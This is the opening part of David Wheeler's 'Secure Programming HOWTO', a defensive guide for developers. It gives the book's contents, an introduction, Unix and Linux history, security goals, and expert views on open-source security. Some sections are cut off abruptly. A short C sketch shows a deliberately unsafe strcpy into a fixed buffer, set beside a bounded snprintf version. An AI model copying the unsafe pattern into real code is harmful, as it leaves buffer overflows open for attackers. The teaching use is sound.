Secure Programming HOWTO
by David A. Wheeler
v3.72 Edition, published 2015-09-19
Copyright © 1999, 2000, 2001, 2002, 2003, 2004, 2015 David A. Wheeler
This book provides a set of design and implementation guidelines for writing secure programs. Such programs
include application programs used as viewers of remote data, web applications (including CGI scripts), network
servers, and setuid/setgid programs. Specific guidelines for C, C++, Java, Perl, PHP, Python, Tcl, and Ada95 are
included. It especially covers Linux and Unix based systems, but much of its material applies to any system. For a
current version of the book, see http://www.dwheeler.com/secure-programs
This book is Copyright (C) 1999-2015 David A. Wheeler. Permission is granted to copy, distribute and/or modify this book under the terms of the
GNU Free Documentation License (GFDL), Version 1.1 or any later version published by the Free Software Foundation; with the invariant
sections being “About the Author”, with no Front-Cover Texts, and no Back-Cover texts. A copy of the license is included in the section entitled
“GNU Free Documentation License”. This book is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. The image of the Sallet (ca. 1450) is provided
by the Walters Art Museum in Baltimore, Maryland, at http://art.thewalters.org/detail/40677/sallet/.
Table of Contents
1. Introduction
2. Background
   2.1. History of Unix, Linux, and Open Source / Free Software
      2.1.1. Unix
      2.1.2. Free Software Foundation
      2.1.3. Linux
      2.1.4. Open Source / Free Software
      2.1.5. Comparing Linux and Unix
   2.2. Security Principles
   2.3. Why do Programmers Write Insecure Code?
   2.4. Is Open Source Good for Security?
      2.4.1. View of Various Experts
      2.4.2. Why Closing the Source Doesn’t Halt Attacks
      2.4.3. Why Keeping Vulnerabilities Secret Doesn’t Make Them Go Away
      2.4.4. How OSS/FS Counters Trojan Horses
      2.4.5. Other Advantages
      2.4.6. Bottom Line
   2.5. Types of Secure Programs
   2.6. Paranoia is a Virtue
   2.7. Why Did I Write This Document?
   2.8. Sources of Design and Implementation Guidelines
   2.9. Other Sources of Security Information
   2.10. Document Conventions
3. Summary of Linux and Unix Security Features
   3.1. Processes
      3.1.1. Process Attributes
      3.1.2. POSIX Capabilities
      3.1.3. Process Creation and Manipulation
   3.2. Files
      3.2.1. Filesystem Object Attributes
      3.2.2. POSIX Access Control Lists (ACLs)
         3.2.2.1. History of POSIX Access Control Lists (ACLs)
         3.2.2.2. Data used in POSIX Access Control Lists (ACLs)
      3.2.3. Creation Time Initial Values
      3.2.4. Changing Access Control Attributes
      3.2.5. Using Access Control Attributes
      3.2.6. Filesystem Hierarchy
   3.3. System V IPC
   3.4. Sockets and Network Connections
   3.5. Signals
   3.6. Quotas and Limits
   3.7. Dynamically Linked Libraries
   3.8. Audit
   3.9. PAM
   3.10. Specialized Security Extensions for Unix-like Systems
4. Security Requirements
   4.1. Common Criteria Introduction
   4.2. Security Environment and Objectives
   4.3. Security Functionality Requirements
   4.4. Security Assurance Measure Requirements
5. Validate All Input
   5.1. Basics of input validation
   5.2. Input Validation Tools including Regular Expressions
      5.2.1. Introduction to regular expressions
      5.2.2. Using regular expressions for input validation
      5.2.3. Regular expression denial of service (reDOS) attacks
   5.3. Command line
   5.4. Environment Variables
      5.4.1. Some Environment Variables are Dangerous
      5.4.2. Environment Variable Storage Format is Dangerous
      5.4.3. The Solution - Extract and Erase
      5.4.4. Don’t Let Users Set Their Own Environment Variables
   5.5. File Descriptors
   5.6. File Names
   5.7. File Contents
   5.8. Web-Based Application Inputs (Especially CGI Scripts)
   5.9. Other Inputs
   5.10. Human Language (Locale) Selection
      5.10.1. How Locales are Selected
      5.10.2. Locale Support Mechanisms
      5.10.3. Legal Values
      5.10.4. Bottom Line
   5.11. Character Encoding
      5.11.1. Introduction to Character Encoding
      5.11.2. Introduction to UTF-8
      5.11.3. UTF-8 Security Issues
      5.11.4. UTF-8 Legal Values
      5.11.5. UTF-8 Related Issues
   5.12. Prevent Cross-site Malicious Content on Input
   5.13. Filter HTML/URIs That May Be Re-presented
      5.13.1. Remove or Forbid Some HTML Data
      5.13.2. Encoding HTML Data
      5.13.3. Validating HTML Data
      5.13.4. Validating Hypertext Links (URIs/URLs)
      5.13.5. Other HTML tags
      5.13.6. Related Issues
   5.14. Forbid HTTP GET To Perform Non-Queries
   5.15. Counter SPAM
   5.16. Limit Valid Input Time and Load Level
6. Restrict Operations to Buffer Bounds (Avoid Buffer Overflow)
   6.1. Dangers in C/C++
   6.2. Library Solutions in C/C++
      6.2.1. Standard C Library Solution
      6.2.2. Static and Dynamically Allocated Buffers
      6.2.3. strlcpy and strlcat
      6.2.4. asprintf and vasprintf
      6.2.5. libmib
      6.2.6. Safestr library (Messier and Viega)
      6.2.7. C++ std::string class
      6.2.8. Libsafe
      6.2.9. Other Libraries
   6.3. Compilation Solutions in C/C++
   6.4. Other Languages
7. Design Your Program for Security
   7.1. Follow Good Security Design Principles
   7.2. Secure the Interface
   7.3. Separate Data and Control
   7.4. Minimize Privileges
      7.4.1. Minimize the Privileges Granted
      7.4.2. Minimize the Time the Privilege Can Be Used
      7.4.3. Minimize the Time the Privilege is Active
      7.4.4. Minimize the Modules Granted the Privilege
      7.4.5. Consider Using FSUID To Limit Privileges
      7.4.6. Consider Using Chroot to Minimize Available Files
      7.4.7. Consider Minimizing the Accessible Data
      7.4.8. Consider Minimizing the Resources Available
   7.5. Minimize the Functionality of a Component
   7.6. Avoid Creating Setuid/Setgid Scripts
   7.7. Configure Safely and Use Safe Defaults
   7.8. Load Initialization Values Safely
   7.9. Minimize the Accessible Data
   7.10. Fail Safe
   7.11. Avoid Race Conditions
      7.11.1. Sequencing (Non-Atomic) Problems
         7.11.1.1. Atomic Actions in the Filesystem
         7.11.1.2. Temporary Files
      7.11.2. Locking
         7.11.2.1. Using Files as Locks
         7.11.2.2. Other Approaches to Locking
   7.12. Trust Only Trustworthy Channels
   7.13. Set up a Trusted Path
   7.14. Use Internal Consistency-Checking Code
   7.15. Self-limit Resources
   7.16. Prevent Cross-Site (XSS) Malicious Content
      7.16.1. Explanation of the Problem
      7.16.2. Solutions to Cross-Site Malicious Content
         7.16.2.1. Identifying Special Characters
         7.16.2.2. Filtering
         7.16.2.3. Encoding (Quoting)
   7.17. Foil Semantic Attacks
   7.18. Be Careful with Data Types
   7.19. Avoid Algorithmic Complexity Attacks
8. Carefully Call Out to Other Resources
   8.1. Call Only Safe Library Routines
   8.2. Limit Call-outs to Valid Values
   8.3. Handle Metacharacters
      8.3.1. SQL injection
      8.3.2. Shell injection
      8.3.3. Problematic pathnames and filenames
      8.3.4. Other injection issues
   8.4. Call Only Interfaces Intended for Programmers
   8.5. Check All System Call Returns
   8.6. Avoid Using vfork(2)
   8.7. Counter Web Bugs When Retrieving Embedded Content
   8.8. Hide Sensitive Information
9. Send Information Back Judiciously
   9.1. Minimize Feedback
   9.2. Don’t Include Comments
   9.3. Handle Full/Unresponsive Output
   9.4. Control Data Formatting (Format Strings)
   9.5. Control Character Encoding in Output
   9.6. Prevent Include/Configuration File Access
10. Language-Specific Issues
   10.1. C/C++
   10.2. Perl
   10.3. Python
   10.4. Shell Scripting Languages (sh and csh Derivatives)
   10.5. Ada
   10.6. Java
   10.7. Tcl
   10.8. PHP
11. Special Topics
   11.1. Passwords
   11.2. Authenticating on the Web
      11.2.1. Authenticating on the Web: Logging In
      11.2.2. Authenticating on the Web: Subsequent Actions
      11.2.3. Authenticating on the Web: Logging Out
   11.3. Random Numbers
   11.4. Specially Protect Secrets (Passwords and Keys) in User Memory
   11.5. Cryptographic Algorithms and Protocols
      11.5.1. Cryptographic Protocols
      11.5.2. Symmetric Key Encryption Algorithms
      11.5.3. Public Key Algorithms
      11.5.4. Cryptographic Hash Algorithms
      11.5.5. Integrity Checking
      11.5.6. Randomized Message Authentication Mode (RMAC)
      11.5.7. Other Cryptographic Issues
   11.6. Using PAM
   11.7. Tools
   11.8. Windows CE
   11.9. Write Audit Records
   11.10. Physical Emissions
   11.11. Miscellaneous
12. Conclusion
13. Bibliography
A. History
B. Acknowledgements
C. About the Documentation License
D. GNU Free Documentation License
E. Endorsements
F. About the Author
Index

List of Tables
3-1. POSIX ACL Entry Types
5-1. Legal UTF-8 Sequences
Chapter 1. Introduction
A wise man attacks the city of the mighty
and pulls down the stronghold in which
they trust.
Proverbs 21:22 (NIV)
This book describes a set of guidelines for writing secure programs. For purposes of this book, a “secure
program” is a program that sits on a security boundary, taking input from a source that does not have the
same access rights as the program. Such programs include application programs used as viewers of
remote data, web applications (including CGI scripts), network servers, and setuid/setgid programs. This
book does not address modifying the operating system kernel itself, although many of the principles
discussed here do apply. These guidelines were developed as a survey of “lessons learned” from various
sources on how to create such programs (along with additional observations by the author), reorganized
into a set of larger principles. This book includes specific guidance for a number of languages, including
C, C++, Java, Perl, PHP, Python, Tcl, and Ada95. It especially covers Linux and Unix based systems, but
much of its material applies to any system.
Why read this book? Because today, programs are under attack. Techniques such as constantly patching
systems and training users in computer security are simply not enough to counter computer attacks. The
Witty worm of 2004, for example, demonstrated that depending on patches "failed spectacularly"
because attackers could deploy attacks faster than users could install patches (the attack began one day
after the patch was announced, and only 45 minutes later most vulnerable systems were infected). The
Witty worm also demonstrated that deploying proactive measures wasn’t enough: all of its victims had at
least installed a firewall. Long ago, putting a fence around a computer eliminated most threats. Today,
most programs have network connections or take data sent through a network (and possibly from an
attacker), and other defensive measures simply haven’t been able to counter attackers. Thus, all software
developers must know how to counter attacks.
You can find the master copy of this book at http://www.dwheeler.com/secure-programs. This book is
also part of the Linux Documentation Project (LDP) at http://www.tldp.org. It’s also mirrored in several
other places. Please note that these mirrors, including the LDP copy and/or the copy in your distribution,
may be older than the master copy. I’d like to hear comments on this book, but please do not send
comments until you’ve checked to make sure that your comment is valid for the latest version.
This book does not cover assurance measures, software engineering processes, and quality assurance
approaches, which are important but widely discussed elsewhere. Such measures include testing, peer
review, configuration management, and formal methods. Documents specifically identifying sets of
development assurance measures for security issues include the Common Criteria (CC, [CC 1999]) and
the Systems Security Engineering Capability Maturity Model [SSE-CMM 1999]. Inspections and other
peer review techniques are discussed in [Wheeler 1996]. This book does briefly discuss ideas from the
CC, but only as an organizational aid to discuss security requirements. More general sets of software
engineering processes are defined in documents such as the Software Engineering Institute’s Capability
Maturity Model for Software (SW-CMM) [Paulk 1993a, 1993b] and ISO 12207 [ISO 12207]. General
international standards for quality systems are defined in ISO 9000 and ISO 9001 [ISO 9000, 9001].
This book does not discuss how to configure a system (or network) to be secure in a given environment.
This is clearly necessary for secure use of a given program, but a great many other documents discuss
secure configurations. An excellent general book on configuring Unix-like systems to be secure is
Garfinkel [1996]. Other books for securing Unix-like systems include Anonymous [1998]. You can also
find information on configuring Unix-like systems at web sites such as
http://www.unixtools.com/security.html. Information on configuring a Linux system to be secure is
available in a wide variety of documents including Fenzi [1999], Seifried [1999], Wreski [1998], Swan
[2001], and Anonymous [1999]. Geodsoft [2001] describes how to harden OpenBSD, and many of its
suggestions are useful for any Unix-like system. Information on auditing existing Unix-like systems is
discussed in Mookhey [2002]. For Linux systems (and eventually other Unix-like systems), you may
want to examine the Bastille Hardening System, which attempts to “harden” or “tighten” the Linux
operating system. You can learn more about Bastille at http://www.bastille-linux.org; it is available for
free under the General Public License (GPL). Other hardening systems include grsecurity. For Windows
2000, you might want to look at Cox [2000]. The U.S. National Security Agency (NSA) maintains a set
of security recommendation guides at http://nsa1.www.conxion.com, including the “60 Minute Network
Security Guide.” If you’re trying to establish a public key infrastructure (PKI) using open source tools,
you might want to look at the Open Source PKI Book. More about firewalls and Internet security is
found in [Cheswick 1994].
Configuring a computer is only part of Computer Security Management, a larger area that also covers
how to deal with viruses, what kind of organizational security policy is needed, business continuity
plans, and so on. There are international standards and guidance for security management. ISO 13335 is
a five-part technical report giving guidance on security management [ISO 13335]. ISO/IEC 17799:2000
defines a code of practice [ISO 17799]; its stated purpose is to give high-level and general
“recommendations for information security management for use by those who are responsible for
initiating, implementing or maintaining security in their organization.” The document specifically
identifies itself as “a starting point for developing organization specific guidance.” It also states that not
all of the guidance and controls it contains may be applicable, and that additional controls not contained
may be required. Even more importantly, they are intended to be broad guidelines covering a number of
areas, and not intended to give definitive details or "how-tos". It’s worth noting that the original signing
of ISO/IEC 17799:2000 was controversial; Belgium, Canada, France, Germany, Italy, Japan and the US
voted against its adoption. However, it appears that these votes were primarily a protest on parliamentary
procedure, not on the content of the document, and certainly people are welcome to use ISO 17799 if
they find it helpful. More information about ISO 17799 can be found in NIST’s ISO/IEC 17799:2000
FAQ. ISO 17799 is highly related to BS 7799 part 1 and 2; more information about BS 7799 can be
found at http://www.xisec.com/faq.htm. ISO 17799 is currently under revision. It’s important to note that
none of these standards (ISO 13335, ISO 17799, or BS 7799 parts 1 and 2) are intended to be a detailed
set of technical guidelines for software developers; they are all intended to provide broad guidelines in a
number of areas. This is important, because software developers who simply follow (for example)
ISO 17799 will generally not produce secure software - developers need much, much, much more detail
than ISO 17799 provides.
Of course, computer security management is part of the even broader area of security in general. Clearly
you should ensure that your physical environment is secure as well, depending on your threats. You
might find this Anti-Defamation League document useful.
The Commonly Accepted Security Practices & Recommendations (CASPR) project at
http://www.caspr.org is trying to distill information security knowledge into a series of papers available
to all (under the GNU FDL license, so that future document derivatives will continue to be available to
all). Clearly, security management needs to include keeping up with patches as vulnerabilities are found and
fixed. Beattie [2002] provides an interesting analysis of how to determine when to apply patches,
contrasting the risk of a bad patch with the risk of intrusion (e.g., under certain conditions, patches are
optimally applied 10 or 30 days after they are released).
If you’re interested in the current state of vulnerabilities, there are other resources available to use. The
CVE at http://cve.mitre.org gives a standard identifier for each (widespread) vulnerability. The paper
SecurityTracker Statistics analyzes reported vulnerabilities to determine which were the most
common. The Internet Storm Center at http://isc.incidents.org/ shows the prominence of various
Internet attacks around the world.
This book assumes that the reader understands computer security issues in general, the general security
model of Unix-like systems, networking (in particular TCP/IP based networks), and the C programming
language. This book does include some information about the Linux and Unix programming model for
security. If you need more information on how TCP/IP based networks and protocols work, including
their security protocols, consult general works on TCP/IP such as [Murhammer 1998].
When I first wrote this document, there were many short articles but no books on writing secure
programs. There are now other books on writing secure programs. One is “Building Secure Software” by
John Viega and Gary McGraw [Viega 2002]; this is a very good book that discusses a number of
important security issues, but it omits a large number of important security problems that are instead
covered here. Basically, this book selects several important topics and covers them well, but at the cost of
omitting many other important topics. The Viega book has a little more information for Unix-like
systems than for Windows systems, but much of it is independent of the kind of system. The other book
is “Writing Secure Code” by Michael Howard and David LeBlanc [Howard 2002]. The title of that book
is misleading; that book is solely about writing secure programs for Windows, and is not very helpful if
you are writing programs for any other system. This shouldn’t be surprising; it’s published by Microsoft
Press, and its copyright is owned by Microsoft. If you are trying to write secure programs for Microsoft’s
Windows systems, though, it’s a good book. Another useful source of secure programming guidance is
the Open Web Application Security Project (OWASP) Guide to Building Secure Web Applications
and Web Services; it has more on process and fewer specifics than this book, but it has useful material in it.
This book especially focuses on all Unix-like systems, including Linux-based systems (including
Debian, Ubuntu, Red Hat Enterprise Linux, Fedora, CentOS, and SuSE), Unix systems (including
Solaris, FreeBSD, NetBSD, and OpenBSD), MacOS, Android, and iOS. In several places it includes
details about Linux specifically. That said, much of this material is not limited to a particular operating
system, and there’s some material specifically on other systems like Windows. If you know relevant
information not already included here, please let me know.
This book is copyright (C) 1999-2015 David A. Wheeler and is covered by the GNU Free
Documentation License (GFDL); see Appendix C and Appendix D for more information.
Chapter 2 discusses the background of Unix, Linux, and security. Chapter 3 describes the general Unix
and Linux security model, giving an overview of the security attributes and operations of processes,
filesystem objects, and so on. (Windows is not the same, but there are many similarities.) This is
followed by the meat of this book, a set of design and implementation guidelines for developing
applications. This focuses more on Linux and Unix systems, but not exclusively so. The book ends with
conclusions in Chapter 12, followed by a lengthy bibliography and appendixes.
The design and implementation guidelines are divided into categories which I believe emphasize the
programmer’s viewpoint. Programs accept inputs, process data, call out to other resources, and produce
output, as shown in Figure 1-1; notionally all security guidelines fit into one of these categories. I’ve
subdivided “process data” into structuring program internals and approach, avoiding buffer overflows
(which in some cases can also be considered an input issue), language-specific information, and special
topics. The chapters are ordered to make the material easier to follow. Thus, the book chapters giving
guidelines discuss validating all input (Chapter 5), avoiding buffer overflows (Chapter 6), structuring
program internals and approach (Chapter 7), carefully calling out to other resources (Chapter 8),
judiciously sending information back (Chapter 9), language-specific information (Chapter 10), and
finally information on special topics such as how to acquire random numbers (Chapter 11).
[Figure 1-1: a program receives input, processes data (structure program internals, avoid buffer overflow, language-specific issues, and special topics), calls out to other programs, and produces output.]
Chapter 2. Background
I issued an order and a search was
made, and it was found that this city has
a long history of revolt against kings
and has been a place of rebellion and
sedition.
Ezra 4:19 (NIV)
2.1.1. Unix
In 1969-1970, Kenneth Thompson, Dennis Ritchie, and others at AT&T Bell Labs began developing a
small operating system on a little-used PDP-7. The operating system was soon christened Unix, a pun on
an earlier operating system project called MULTICS. In 1972-1973 the system was rewritten in the
programming language C, an unusual step that was visionary: due to this decision, Unix was the first
widely-used operating system that could switch from and outlive its original hardware. Other innovations
were added to Unix as well, in part due to synergies between Bell Labs and the academic community. In
1979, the “seventh edition” (V7) version of Unix was released, the grandfather of all extant Unix
systems.
After this point, the history of Unix becomes somewhat convoluted. The academic community, led by
Berkeley, developed a variant called the Berkeley Software Distribution (BSD), while AT&T continued
developing Unix under the names “System III” and later “System V”. In the late 1980s through early
1990s, the “wars” between these two major strains raged. After many years, each variant adopted many of
the key features of the other. Commercially, System V won the “standards wars” (getting most of its
interfaces into the formal standards), and most hardware vendors switched to AT&T’s System V.
However, System V ended up incorporating many BSD innovations, so the resulting system was more a
merger of the two branches. The BSD branch did not die, but instead became widely used for research,
for PC hardware, and for single-purpose servers (e.g., many web sites use a BSD derivative).
The result was many different versions of Unix, all based on the original seventh edition. Most versions
of Unix were proprietary and maintained by their respective hardware vendor, for example, Sun Solaris
is a variant of System V. Three versions of the BSD branch of Unix ended up as open source: FreeBSD
(concentrating on ease-of-installation for PC-type hardware), NetBSD (concentrating on many different
CPU architectures), and a variant of NetBSD, OpenBSD (concentrating on security). More general
information about Unix history can be found at
http://www.datametrics.com/tech/unix/uxhistry/brf-hist.htm, http://perso.wanadoo.fr/levenez/unix, and
http://www.crackmonkey.org/unix.html (note that Microsoft Windows systems can’t read that last one).
The Unix Heritage Society refers to several sources of Unix history. Much more information about the
BSD history can be found in [McKusick 1999] and
ftp://ftp.freebsd.org/pub/FreeBSD/FreeBSD-current/src/share/misc/bsd-family-tree.
A slightly old but interesting advocacy piece that presents arguments for using Unix-like systems (instead
of Microsoft’s products) is John Kirch’s paper “Microsoft Windows NT Server 4.0 versus UNIX”.
2.1.3. Linux
In 1991 Linus Torvalds began developing an operating system kernel, which he named “Linux”
[Torvalds 1999]. This kernel could be combined with the FSF material and other components (in
particular some of the BSD components and MIT’s X-windows software) to produce a freely-modifiable
and very useful operating system. This book will term the kernel itself the “Linux kernel” and an entire
combination as “Linux”. Note that many use the term “GNU/Linux” instead for this combination.
In the Linux community, different organizations have combined the available components differently.
Each combination is called a “distribution”, and the organizations that develop distributions are called
“distributors”. Common distributions include Red Hat, Mandrake, SuSE, Caldera, Corel, and Debian.
There are differences between the various distributions, but all distributions are based on the same
foundation: the Linux kernel and the GNU glibc libraries. Since both are covered by “copyleft” style
licenses, changes to these foundations generally must be made available to all, a unifying force between
the Linux distributions at their foundation that does not exist between the BSD and AT&T-derived Unix
systems. This book is not specific to any Linux distribution; when it discusses Linux it presumes Linux
kernel version 2.2 or greater and the C library glibc 2.1 or greater, valid assumptions for essentially all
current major Linux distributions.
using the term may have other motives (e.g., higher reliability) or simply wish to appear less strident.
Information on this definition of free software, and the motivations behind it, can be found at
http://www.fsf.org.
Those interested in reading advocacy pieces for open source software and free software should see
http://www.opensource.org and http://www.fsf.org. There are other documents which examine such
software, for example, Miller [1995] found that the open source software was noticeably more reliable
than proprietary software (using their measurement technique, which measured resistance to crashing
due to random input).
• Confidentiality (also known as secrecy), meaning that the computing system’s assets can be read only
by authorized parties.
• Integrity, meaning that the assets can only be modified or deleted by authorized parties in authorized
ways.
• Availability, meaning that the assets are accessible to the authorized parties in a timely manner (as
determined by the system’s requirements). The failure to meet this goal is called a denial of service.
Some people define additional major security objectives, while others lump those additional goals as
special cases of these three. For example, some separately identify non-repudiation as an objective; this
is the ability to “prove” that a sender sent or receiver received a message (or both), even if the sender or
receiver wishes to deny it later. Privacy is sometimes addressed separately from confidentiality; some
define this as protecting the confidentiality of a user (e.g., their identity) instead of the data. Most
objectives require identification and authentication, which is sometimes listed as a separate objective.
Often auditing (also called accountability) is identified as a desirable security objective. Sometimes
“access control” and “authenticity” are listed separately as well. For example, the U.S. Department of
Defense (DoD), in DoD Directive 3600.1, defines “information assurance” as “information operations
(IO) that protect and defend information and information systems by ensuring their availability, integrity,
authentication, confidentiality, and nonrepudiation. This includes providing for restoration of
information systems by incorporating protection, detection, and reaction capabilities.”
In any case, it is important to identify your program’s overall security objectives, no matter how you
group them together, so that you’ll know when you’ve met them.
Sometimes these objectives are a response to a known set of threats, and sometimes some of these
objectives are required by law. For example, for U.S. banks and other financial institutions, there’s a new
privacy law called the “Gramm-Leach-Bliley” (GLB) Act. This law mandates disclosure of personal
information shared and means of securing that data, requires disclosure of personal information that will
be shared with third parties, and directs institutions to give customers a chance to opt out of data sharing.
[Jones 2000]
There is sometimes conflict between security and some other general system/software engineering
principles. Security can sometimes interfere with “ease of use”, for example, installing a secure
configuration may take more effort than a “trivial” installation that works but is insecure. Often, this
apparent conflict can be resolved; for example, by re-thinking a problem it’s often possible to make a
secure system that is also easy to use. There’s also sometimes a conflict between security and abstraction
(information hiding); for example, some high-level library routines may be implemented securely or not,
but their specifications won’t tell you. In the end, if your application must be secure, you must do things
yourself if you can’t be sure otherwise - yes, the library should be fixed, but it’s your users who will be
hurt by your poor choice of library routines.
A good general security principle is “defense in depth”; you should have numerous defense mechanisms
(“layers”) in place, designed so that an attacker has to defeat multiple mechanisms to perform a
successful attack.
For general principles on how to design secure programs, see Section 7.1.
• There is no curriculum that addresses computer security in most schools. Even when there is a
computer security curriculum, it often doesn’t discuss how to write secure programs as a whole.
Many such curricula only study certain areas such as cryptography or protocols. These are
important, but they often fail to discuss common real-world issues such as buffer overflows, string
formatting, and input checking. I believe this is one of the most important problems; even those
programmers who go through colleges and universities are very unlikely to learn how to write secure
programs, yet we depend on those very people to write secure programs.
• Programming books/classes do not teach secure/safe programming techniques. Indeed, until recently
there were no books on how to write secure programs at all (this book is one of those few).
• No one uses formal verification methods.
• C is an unsafe language, and the standard C library string functions are unsafe. This is particularly
important because C is so widely used - the “simple” ways of using C permit dangerous exploits (see the short sketch after this list).
• Programmers do not think “multi-user.”
• Programmers are human, and humans are lazy. Thus, programmers will often use the “easy” approach
instead of a secure approach - and once it works, they often fail to fix it later.
• Most programmers are simply not good programmers.
• Most programmers are not security people; they simply don’t often think like an attacker does.
• Most security people are not programmers. This was a statement made by some Bugtraq contributors,
but it’s not clear that this claim is really true.
• Most computer security models are terrible.
• There is lots of “broken” legacy software. Fixing this software (to remove security faults or to make it
work with more restrictive security policies) is difficult.
• Consumers don’t care about security. (Personally, I have hope that consumers are beginning to care
about security; a computer system that is constantly exploited is neither useful nor user-friendly. Also,
many consumers are unaware that there’s even a problem, assume that it can’t happen to them, or think
that things cannot be made better.)
• Security costs extra development time.
• Security costs in terms of additional testing (red teams, etc.).
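To make the point about C’s standard string functions concrete, here is a small sketch (my own illustration, not code taken from any existing program) contrasting the “simple” approach with a length-bounded one; Chapter 6 discusses this problem area in depth:

    /* Hypothetical sketch: why the "simple" C string calls are dangerous. */
    #include <stdio.h>
    #include <string.h>

    void risky(const char *attacker_data)
    {
        char buf[16];
        /* strcpy() copies until it reaches a '\0', no matter how small buf is;
         * input longer than 15 characters writes past the end of buf. */
        strcpy(buf, attacker_data);               /* DANGEROUS */
        printf("%s\n", buf);
    }

    void safer(const char *attacker_data)
    {
        char buf[16];
        /* snprintf() writes at most sizeof(buf) bytes, including the final '\0',
         * so overly long input is truncated instead of overflowing the buffer. */
        snprintf(buf, sizeof(buf), "%s", attacker_data);
        printf("%s\n", buf);
    }

Truncating input is not always the right answer (it can cause problems of its own), but the bounded call at least keeps every write inside the buffer.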
Bruce Schneier is a well-known expert on computer security and cryptography. He argues that smart
engineers should “demand open source code for anything related to security” [Schneier 1999], and he
also discusses some of the preconditions which must be met to make open source software secure.
Vincent Rijmen, a developer of the winning Advanced Encryption Standard (AES) encryption algorithm,
believes that the open source nature of Linux provides a superior vehicle to making security
vulnerabilities easier to spot and fix, “Not only because more people can look at it, but, more
importantly, because the model forces people to write more clear code, and to adhere to standards. This
in turn facilitates security review” [Rijmen 2000].
Elias Levy (Aleph1) is the former moderator of one of the most popular security discussion groups -
Bugtraq. He discusses some of the problems in making open source software secure in his article "Is
Open Source Really More Secure than Closed?". His summary is:
So does all this mean Open Source Software is no better than closed source software when it comes to security
vulnerabilities? No. Open Source Software certainly does have the potential to be more secure than its closed
source counterpart. But make no mistake, simply being open source is no guarantee of security.
Whitfield Diffie is the co-inventor of public-key cryptography (the basis of all Internet security) and chief
security officer and senior staff engineer at Sun Microsystems. In his 2003 article Risky business:
Keeping security a secret, he argues that proprietary vendor’s claims that their software is more secure
because it’s secret is nonsense. He identifies and then counters two main claims made by proprietary
vendors: (1) that release of code benefits attackers more than anyone else because a lot of hostile eyes
can also look at open-source code, and that (2) a few expert eyes are better than several random ones. He
first notes that while giving programmers access to a piece of software doesn’t guarantee they will study
it carefully, there is a group of programmers who can be expected to care deeply: Those who either use
the software personally or work for an enterprise that depends on it. “In fact, auditing the programs on
which an enterprise depends for its own security is a natural function of the enterprise’s own
information-security organization.” He then counters the second argument, noting that “As for the notion
that open source’s usefulness to opponents outweighs the advantages to users, that argument flies in the
face of one of the most important principles in security: A secret that cannot be readily changed should
be regarded as a vulnerability.” He closes noting that
“It’s simply unrealistic to depend on secrecy for security in computer software. You may be able to keep the
exact workings of the program out of general circulation, but can you prevent the code from being
reverse-engineered by serious opponents? Probably not.”
John Viega’s article "The Myth of Open Source Security" also discusses issues, and summarizes things
this way:
Open source software projects can be more secure than closed source projects. However, the very things that
can make open source programs secure -- the availability of the source code, and the fact that large numbers of
users are available to look for and fix security holes -- can also lull people into a false sense of security.
Michael H. Warfield’s "Musings on open source security" is very positive about the impact of open
source software on security. In contrast, Fred Schneider doesn’t believe that open source helps security,
saying “there is no reason to believe that the many eyes inspecting (open) source code would be
successful in identifying bugs that allow system security to be compromised” and claiming that “bugs in
the code are not the dominant means of attack” [Schneider 2000]. He also claims that open source rules
out control of the construction process, though in practice there is such control - all major open source
programs have one or a few official versions with “owners” with reputations at stake. Peter G. Neumann
discusses “open-box” software (in which source code is available, possibly only under certain
conditions), saying “Will open-box software really improve system security? My answer is not by itself,
although the potential is considerable” [Neumann 2000]. TruSecure Corporation, under sponsorship by
Red Hat (an open source company), has developed a paper on why they believe open source is more
effective for security [TruSecure 2001]. Natalie Walker Whitlock’s IBM DeveloperWorks article
discusses the pros and cons as well. Brian Witten, Carl Landwehr, and Michael Caloyannides [Witten
2001] published in IEEE Software an article tentatively concluding that having source code available
should work in the favor of system security; they note:
“We can draw four additional conclusions from this discussion. First, access to source code lets users improve
system security -- if they have the capability and resources to do so. Second, limited tests indicate that for some
cases, open source life cycles produce systems that are less vulnerable to nonmalicious faults. Third, a survey
of three operating systems indicates that one open source operating system experienced less exposure in the
form of known but unpatched vulnerabilities over a 12-month period than was experienced by either of two
proprietary counterparts. Last, closed and proprietary system development models face disincentives toward
fielding and supporting more secure systems as long as less secure systems are more profitable.
Notwithstanding these conclusions, arguments in this important matter are in their formative stages and in dire
need of metrics that can reflect security delivered to the customer.”
Scott A. Hissam and Daniel Plakosh’s “Trust and Vulnerability in Open Source Software” discusses the
pluses and minuses of open source software. As with other papers, they note that just because the
software is open to review, it should not automatically follow that such a review has actually been
performed. Indeed, they note that this is a general problem for all software, open or closed - it is often
questionable if many people examine any given piece of software. One interesting point is that they
demonstrate that attackers can learn about a vulnerability in a closed source program (Windows) from
patches made to an OSS/FS program (Linux). In this example, Linux developers fixed a vulnerability
before attackers tried to attack it, and attackers correctly surmised that a similar problem might still be
in Windows (and it was). Unless OSS/FS programs are forbidden, this kind of learning is difficult to
prevent. Therefore, the existence of an OSS/FS program can reveal the vulnerabilities of both the
OSS/FS and proprietary programs performing the same function - but in this example, the OSS/FS
program was fixed first.
to find those problems; I’ll group the techniques into “dynamic” techniques (where you run the program)
and “static” techniques (where you examine the program’s code - be it source code or machine code).
In “dynamic” approaches, an attacker runs the program, sending it data (often problematic data), and
sees if the program’s response indicates a common vulnerability. Open and closed programs have no
difference here, since the attacker isn’t looking at code.
Attackers may also look at the code, the “static” approach. For open source software, they’ll probably
look at the source code and search it for patterns. For closed source software, they can search the machine
code (usually presented in assembly language format to simplify the task) for patterns that suggest
security problems. In fact, there are several tools that do this. Attackers might also use tools called
“decompilers” that turn the machine code back into source code and then search the source code for the
vulnerable patterns (the same way they would search for vulnerabilities in source code in open source
software). See Flake [2001] for one discussion of how closed code can still be examined for security
vulnerabilities (e.g., using disassemblers). This point is important: even if an attacker wanted to use
source code to find a vulnerability, a closed source program has no advantage, because the attacker can
use a decompiler to re-create the source code of the product (for analysis), or use a binary scanning tool.
Non-developers might ask “if decompilers can create source code from machine code, then why do
developers say they need source code instead of just machine code?” The problem is that although
developers don’t need source code to find security problems, developers do need source code to make
substantial improvements to the program. Although decompilers can turn machine code back into a
“source code” of sorts, the resulting source code is extremely hard to modify. Typically most
understandable names are lost, so instead of variables like “grand_total” you get “x123123”, instead of
methods like “display_warning” you get “f123124”, and the code itself may have spatterings of assembly
in it. Also, _ALL_ comments and design information are lost. This isn’t a serious problem for finding
security problems, because generally you’re searching for patterns indicating vulnerabilities, not for
internal variable or method names. Thus, decompilers and binary code scanning tools can be useful for
